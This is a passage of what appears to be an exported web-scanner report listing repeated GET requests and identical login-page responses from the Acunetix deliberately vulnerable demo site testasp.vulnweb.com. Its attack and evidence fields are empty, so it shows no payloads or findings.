Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input 